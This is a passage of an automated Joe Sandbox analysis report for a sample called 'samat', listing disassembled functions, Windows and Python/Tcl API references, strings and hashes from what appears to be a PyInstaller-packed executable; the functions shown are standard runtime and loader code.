Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
Instruction ID: 0f0351766d532e8329fa7609a255cc26f3cec78aba50a6adecb84e9bc3bcff5f
Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
Instruction Fuzzy Hash: BFD1C26AB2824246E721BF31DC423B9E399EF54784FC4C137EA0E87695DEBCE4418761

Function 00007FF7E12DA614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7E12DA68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7E12DA6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF7E12DA6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF7E12DA719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7E12DA723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7E12DA72E

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: 84ae083db916b73a3733ca75b8e9d0c1cd0b6ab5210fd16ecbf27b7c1088da8e
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: 06317E32708B8186EB219B25EC417AEB3A8FB88754F944136EA8D47B54DF7CC145CB11

Function 00007FF7E12E1874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E18C0
FindFirstFileExW.KERNEL32 ref: 00007FF7E12E19CA

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
Instruction ID: 068de04bf61d9c0822f8e4dbc7e7ab4d78100c12cb94ced40b438c1c9ad3aafc
Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
Instruction Fuzzy Hash: 0BB1B922B1868241EF62AB21DD027B9E398EB44BE4F849137D95D877C5EEBCE441D313

Function 00007FF7E12E5E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7E12E5EAA

Part of subcall function 00007FF7E12E55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E560C

_get_daylight.LIBCMT ref: 00007FF7E12E5EBB

Part of subcall function 00007FF7E12E5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E55AC

_get_daylight.LIBCMT ref: 00007FF7E12E5ECC

Part of subcall function 00007FF7E12E55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E55DC

Part of subcall function 00007FF7E12DA948: HeapFree.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
Part of subcall function 00007FF7E12DA948: GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7E12E610C), ref: 00007FF7E12E5EF3

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
Instruction ID: ec6905452d3a93276458e62181b3dfd23d87d646b480793fcc8ea68b0a1b986e
Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
Instruction Fuzzy Hash: 0C519276B1864246E711FF31DC826A9E769FB58784FC0813BEA0E83695DFBCE4008761

Function 00007FF7E12C5830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5840
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5852
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5889
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C589B
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58B4
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58C6
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58DF
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58F1
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C590D
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C591F
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C593B
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C594D
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5969
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C597B
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5997
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C59A9
GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C59C5
GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C59D7

Strings

Py_ExitStatusException, xrefs: 00007FF7E12C58AA, 00007FF7E12C58CC
PyUnicode_Decode, xrefs: 00007FF7E12C5EF1, 00007FF7E12C5F13
PyErr_Clear, xrefs: 00007FF7E12C5AA1, 00007FF7E12C5AC3
Py_PreInitialize, xrefs: 00007FF7E12C595F, 00007FF7E12C5981
PyUnicode_FromString, xrefs: 00007FF7E12C5F7B, 00007FF7E12C5F9D
PyImport_ImportModule, xrefs: 00007FF7E12C5C3F, 00007FF7E12C5C61
PyErr_Fetch, xrefs: 00007FF7E12C5ACF, 00007FF7E12C5AF1
PyStatus_Exception, xrefs: 00007FF7E12C5E39, 00007FF7E12C5E5B
PySys_SetObject, xrefs: 00007FF7E12C5E95, 00007FF7E12C5EB7
PyConfig_Clear, xrefs: 00007FF7E12C598D, 00007FF7E12C59AF
PyMem_RawFree, xrefs: 00007FF7E12C5C9B, 00007FF7E12C5CBD
PyObject_CallFunction, xrefs: 00007FF7E12C5CF7, 00007FF7E12C5D19
PyObject_GetAttrString, xrefs: 00007FF7E12C5D53, 00007FF7E12C5D75
PyErr_Print, xrefs: 00007FF7E12C5B59, 00007FF7E12C5B7B
Py_DecodeLocale, xrefs: 00007FF7E12C587F, 00007FF7E12C58A1
Py_IsInitialized, xrefs: 00007FF7E12C5931, 00007FF7E12C5953
Py_Finalize, xrefs: 00007FF7E12C58D5, 00007FF7E12C58F7
PyUnicode_FromFormat, xrefs: 00007FF7E12C5F4D, 00007FF7E12C5F6F
PyObject_SetAttrString, xrefs: 00007FF7E12C5D81, 00007FF7E12C5DA3
PyConfig_Read, xrefs: 00007FF7E12C59E9, 00007FF7E12C5A0B
PyConfig_SetBytesString, xrefs: 00007FF7E12C5A17, 00007FF7E12C5A39
PyConfig_SetString, xrefs: 00007FF7E12C5A45, 00007FF7E12C5A67
PyRun_SimpleStringFlags, xrefs: 00007FF7E12C5E0B, 00007FF7E12C5E2D
PyUnicode_Join, xrefs: 00007FF7E12C5FA9, 00007FF7E12C5FCB
PyImport_ExecCodeModule, xrefs: 00007FF7E12C5C11, 00007FF7E12C5C33
PyEval_EvalCode, xrefs: 00007FF7E12C5BB5, 00007FF7E12C5BD7
Failed to get address for %hs, xrefs: 00007FF7E12C5861
Py_DecRef, xrefs: 00007FF7E12C5836, 00007FF7E12C5858
PyUnicode_DecodeFSDefault, xrefs: 00007FF7E12C5F1F, 00007FF7E12C5F41
PyErr_Restore, xrefs: 00007FF7E12C5B87, 00007FF7E12C5BA9
GetProcAddress, xrefs: 00007FF7E12C5868
PyUnicode_AsUTF8, xrefs: 00007FF7E12C5EC3, 00007FF7E12C5EE5
PyErr_Occurred, xrefs: 00007FF7E12C5B2B, 00007FF7E12C5B4D
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF7E12C5DDD, 00007FF7E12C5DFF
PyErr_NormalizeException, xrefs: 00007FF7E12C5AFD, 00007FF7E12C5B1F
PyImport_AddModule, xrefs: 00007FF7E12C5BE3, 00007FF7E12C5C05
PyObject_Str, xrefs: 00007FF7E12C5DAF, 00007FF7E12C5DD1
Py_InitializeFromConfig, xrefs: 00007FF7E12C5903, 00007FF7E12C5925
PySys_GetObject, xrefs: 00007FF7E12C5E67, 00007FF7E12C5E89
PyUnicode_Replace, xrefs: 00007FF7E12C5FD7, 00007FF7E12C5FF9
PyConfig_InitIsolatedConfig, xrefs: 00007FF7E12C59BB, 00007FF7E12C59DD
PyMarshal_ReadObjectFromString, xrefs: 00007FF7E12C5C6D, 00007FF7E12C5C8F
PyModule_GetDict, xrefs: 00007FF7E12C5CC9, 00007FF7E12C5CEB
PyObject_CallFunctionObjArgs, xrefs: 00007FF7E12C5D25, 00007FF7E12C5D47
PyConfig_SetWideStringList, xrefs: 00007FF7E12C5A73, 00007FF7E12C5A95

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: 984ed8757276d6120e08ce48f0a8d5039e414908a698defd7d51a856468169ef
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: D522B560B09B0781FB06FB65AC167B5A3A9BF15754FC49437C42E82260EFFDB558C222

Function 00007FF7E12C76C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7E12C76D7
GetLastError.KERNEL32 ref: 00007FF7E12C76E9
GetProcAddress.KERNEL32 ref: 00007FF7E12C7725
GetLastError.KERNEL32 ref: 00007FF7E12C7737
GetProcAddress.KERNEL32 ref: 00007FF7E12C7750
GetLastError.KERNEL32 ref: 00007FF7E12C7762
GetProcAddress.KERNEL32 ref: 00007FF7E12C777B
GetLastError.KERNEL32 ref: 00007FF7E12C778D
GetProcAddress.KERNEL32 ref: 00007FF7E12C77A9
GetLastError.KERNEL32 ref: 00007FF7E12C77BB
GetProcAddress.KERNEL32 ref: 00007FF7E12C77D7
GetLastError.KERNEL32 ref: 00007FF7E12C77E9
GetProcAddress.KERNEL32 ref: 00007FF7E12C7805
GetLastError.KERNEL32 ref: 00007FF7E12C7817
GetProcAddress.KERNEL32 ref: 00007FF7E12C7833
GetLastError.KERNEL32 ref: 00007FF7E12C7845
GetProcAddress.KERNEL32 ref: 00007FF7E12C7861
GetLastError.KERNEL32 ref: 00007FF7E12C7873

Strings

Tcl_FindExecutable, xrefs: 00007FF7E12C7746, 00007FF7E12C7768
Tcl_ConditionNotify, xrefs: 00007FF7E12C796B, 00007FF7E12C798D
Tcl_Finalize, xrefs: 00007FF7E12C779F, 00007FF7E12C77C1
Tcl_MutexFinalize, xrefs: 00007FF7E12C790F, 00007FF7E12C7931
Tcl_MutexUnlock, xrefs: 00007FF7E12C78E1, 00007FF7E12C7903
Tcl_GetObjResult, xrefs: 00007FF7E12C7B65, 00007FF7E12C7B87
Tcl_FinalizeThread, xrefs: 00007FF7E12C77CD, 00007FF7E12C77EF
Tcl_ThreadQueueEvent, xrefs: 00007FF7E12C79C7, 00007FF7E12C79E9
Tk_Init, xrefs: 00007FF7E12C7C79, 00007FF7E12C7C9B
Tcl_ConditionWait, xrefs: 00007FF7E12C7999, 00007FF7E12C79BB
Tcl_CreateInterp, xrefs: 00007FF7E12C771B, 00007FF7E12C773D
Tcl_DeleteInterp, xrefs: 00007FF7E12C77FB, 00007FF7E12C781D
Tcl_MutexLock, xrefs: 00007FF7E12C78B3, 00007FF7E12C78D5
Tcl_EvalEx, xrefs: 00007FF7E12C7BC1, 00007FF7E12C7BE3
Tcl_SetVar2Ex, xrefs: 00007FF7E12C7B37, 00007FF7E12C7B59
Tcl_SetVar2, xrefs: 00007FF7E12C7A51, 00007FF7E12C7A73
Tcl_EvalFile, xrefs: 00007FF7E12C7B93, 00007FF7E12C7BB5
Tcl_GetString, xrefs: 00007FF7E12C7AAD, 00007FF7E12C7ACF
Tcl_Alloc, xrefs: 00007FF7E12C7C1D, 00007FF7E12C7C3F
Failed to get address for %hs, xrefs: 00007FF7E12C76F8
Tk_GetNumMainWindows, xrefs: 00007FF7E12C7CA7, 00007FF7E12C7CC9
Tcl_DoOneEvent, xrefs: 00007FF7E12C7771, 00007FF7E12C7793
Tcl_ThreadAlert, xrefs: 00007FF7E12C79F5, 00007FF7E12C7A17
GetProcAddress, xrefs: 00007FF7E12C76FF
Tcl_NewStringObj, xrefs: 00007FF7E12C7ADB, 00007FF7E12C7AFD
Tcl_EvalObjv, xrefs: 00007FF7E12C7BEF, 00007FF7E12C7C11
Tcl_CreateObjCommand, xrefs: 00007FF7E12C7A7F, 00007FF7E12C7AA1
Tcl_GetVar2, xrefs: 00007FF7E12C7A23, 00007FF7E12C7A45
Tcl_GetCurrentThread, xrefs: 00007FF7E12C7857, 00007FF7E12C7879
Tcl_Init, xrefs: 00007FF7E12C76D0, 00007FF7E12C76EF
Tcl_JoinThread, xrefs: 00007FF7E12C7885, 00007FF7E12C78A7
Tcl_ConditionFinalize, xrefs: 00007FF7E12C793D, 00007FF7E12C795F
Tcl_NewByteArrayObj, xrefs: 00007FF7E12C7B09, 00007FF7E12C7B2B
Tcl_Free, xrefs: 00007FF7E12C7C4B, 00007FF7E12C7C6D
Tcl_CreateThread, xrefs: 00007FF7E12C7829, 00007FF7E12C784B

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: b7218dcfee3b163d06d2ccc0e6fc4f2aface9758e9a0294c1fdaf2dc1092c870
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: 8D02D520B09B0B82EF16BB55EC163B4A3A9BF14744FD09137D52E46260EFBDB149C232

Function 00007FF8B7E8D6E0 Relevance: 80.7, APIs: 33, Strings: 13, Instructions: 201threadmemoryCOMMON

Download Yara Rule

APIs

PyThreadState_Swap.PYTHON313 ref: 00007FF8B7E8D6F0
_Py_FatalErrorFunc.PYTHON313 ref: 00007FF8B7E8D70C
PyThreadState_Swap.PYTHON313 ref: 00007FF8B7E8D71E
LocalAlloc.KERNEL32 ref: 00007FF8B7E8D731
_Py_FatalErrorFunc.PYTHON313 ref: 00007FF8B7E8D74D
TlsSetValue.KERNEL32 ref: 00007FF8B7E8D762
PyThreadState_Swap.PYTHON313 ref: 00007FF8B7E8D76A
PyThreadState_Swap.PYTHON313 ref: 00007FF8B7E8D776
PyDict_New.PYTHON313 ref: 00007FF8B7E8D791
PyUnicode_DecodeMBCS.PYTHON313 ref: 00007FF8B7E8D7B2
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8D7CD
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8D7FB
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8D80E
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8D822
PyImport_ImportModule.PYTHON313 ref: 00007FF8B7E8D82F
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8D84A
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8D868
PyRun_StringFlags.PYTHON313 ref: 00007FF8B7E8D889
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8D8A6
PyDict_GetItemString.PYTHON313 ref: 00007FF8B7E8D8B6
PyDict_GetItemString.PYTHON313 ref: 00007FF8B7E8D8DB
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8D904
PyType_Ready.PYTHON313 ref: 00007FF8B7E8D911
PyType_Ready.PYTHON313 ref: 00007FF8B7E8D927
PyType_Ready.PYTHON313 ref: 00007FF8B7E8D93D
PyType_Ready.PYTHON313 ref: 00007FF8B7E8D953
PyType_Ready.PYTHON313 ref: 00007FF8B7E8D969
PyType_Ready.PYTHON313 ref: 00007FF8B7E8D97F
PyType_Ready.PYTHON313 ref: 00007FF8B7E8D995
PyType_Ready.PYTHON313 ref: 00007FF8B7E8D9AB
PyType_Ready.PYTHON313 ref: 00007FF8B7E8D9C1
PyCapsule_Import.PYTHON313 ref: 00007FF8B7E8D9D9
PyType_Ready.PYTHON313 ref: 00007FF8B7E8DA31

Strings

Out of memory allocating thread state., xrefs: 00007FF8B7E8D73F
PyWinInterpreterState_Ensure, xrefs: 00007FF8B7E8D705, 00007FF8B7E8D746
pywintypes: can not setup interpreter state, as current state is invalid, xrefs: 00007FF8B7E8D6FE
__name__, xrefs: 00007FF8B7E8D804
error, xrefs: 00007FF8B7E8D8AC
__builtins__, xrefs: 00007FF8B7E8D840
Exception, xrefs: 00007FF8B7E8D7EE
class error(Exception): def __init__(self, *args, **kw): nargs = len(args) if nargs > 0: self.winerror = args[0] else: self.winerror = None if nargs > 1: self.funcname = args[1] else: self.funcname = None if nargs > 2: self.strerror =, xrefs: 00007FF8B7E8D87D
ignore, xrefs: 00007FF8B7E8D79F
pywintypes, xrefs: 00007FF8B7E8D7AB
datetime.datetime_CAPI, xrefs: 00007FF8B7E8D9D2
builtins, xrefs: 00007FF8B7E8D828
com_error, xrefs: 00007FF8B7E8D8D1

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: ReadyType_$Dict_String$DeallocItem$State_SwapThread$ErrorFatalFuncImport$AllocCapsule_DecodeFlagsImport_LocalModuleRun_Unicode_Value
String ID: Exception$Out of memory allocating thread state.$PyWinInterpreterState_Ensure$__builtins__$__name__$builtins$class error(Exception): def __init__(self, *args, **kw): nargs = len(args) if nargs > 0: self.winerror = args[0] else: self.winerror = None if nargs > 1: self.funcname = args[1] else: self.funcname = None if nargs > 2: self.strerror =$com_error$datetime.datetime_CAPI$error$ignore$pywintypes$pywintypes: can not setup interpreter state, as current state is invalid
API String ID: 3484552599-1312685011
Opcode ID: 3e559cf5b5cfc2f2b8ba3100ed33c113d64749a0116b8bc114fdaa9902568029
Instruction ID: 83d34a21c552652bf1a3999ba5c1d026c04817420103b370063ce33738504c60
Opcode Fuzzy Hash: 3e559cf5b5cfc2f2b8ba3100ed33c113d64749a0116b8bc114fdaa9902568029
Instruction Fuzzy Hash: 8CA1D336A08B0791FA058B6DE85427D23A0FF49FE5F844235EA1E826F5EF3DE9158310

Function 00007FF8B7E8DB30 Relevance: 78.9, APIs: 28, Strings: 17, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B7E8D6E0: PyThreadState_Swap.PYTHON313 ref: 00007FF8B7E8D6F0
Part of subcall function 00007FF8B7E8D6E0: _Py_FatalErrorFunc.PYTHON313 ref: 00007FF8B7E8D70C
Part of subcall function 00007FF8B7E8D6E0: PyThreadState_Swap.PYTHON313 ref: 00007FF8B7E8D71E
Part of subcall function 00007FF8B7E8D6E0: LocalAlloc.KERNEL32 ref: 00007FF8B7E8D731
Part of subcall function 00007FF8B7E8D6E0: _Py_FatalErrorFunc.PYTHON313 ref: 00007FF8B7E8D74D
Part of subcall function 00007FF8B7E8D6E0: TlsSetValue.KERNEL32 ref: 00007FF8B7E8D762
Part of subcall function 00007FF8B7E8D6E0: PyThreadState_Swap.PYTHON313 ref: 00007FF8B7E8D76A
Part of subcall function 00007FF8B7E8D6E0: PyThreadState_Swap.PYTHON313 ref: 00007FF8B7E8D776
Part of subcall function 00007FF8B7E8D6E0: PyDict_New.PYTHON313 ref: 00007FF8B7E8D791
Part of subcall function 00007FF8B7E8D6E0: PyUnicode_DecodeMBCS.PYTHON313 ref: 00007FF8B7E8D7B2
Part of subcall function 00007FF8B7E8D6E0: _Py_Dealloc.PYTHON313 ref: 00007FF8B7E8D7CD

PyModule_Create2.PYTHON313 ref: 00007FF8B7E8DB54
PyModule_GetDict.PYTHON313 ref: 00007FF8B7E8DB69
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DBA3
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DBC3
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DBE3
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DC03
PyModule_AddIntConstant.PYTHON313 ref: 00007FF8B7E8DC22
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DC42
PyType_Ready.PYTHON313 ref: 00007FF8B7E8DC58
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DC78
PyType_Ready.PYTHON313 ref: 00007FF8B7E8DC8E
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DCAE
PyType_Ready.PYTHON313 ref: 00007FF8B7E8DCC4
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DCE4
PyType_Ready.PYTHON313 ref: 00007FF8B7E8DCFA
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DD1A
PyType_Ready.PYTHON313 ref: 00007FF8B7E8DD30
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DD50
PyType_Ready.PYTHON313 ref: 00007FF8B7E8DD66
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DD86
PyType_Ready.PYTHON313 ref: 00007FF8B7E8DD9C
PyDict_SetItemString.PYTHON313 ref: 00007FF8B7E8DDBC
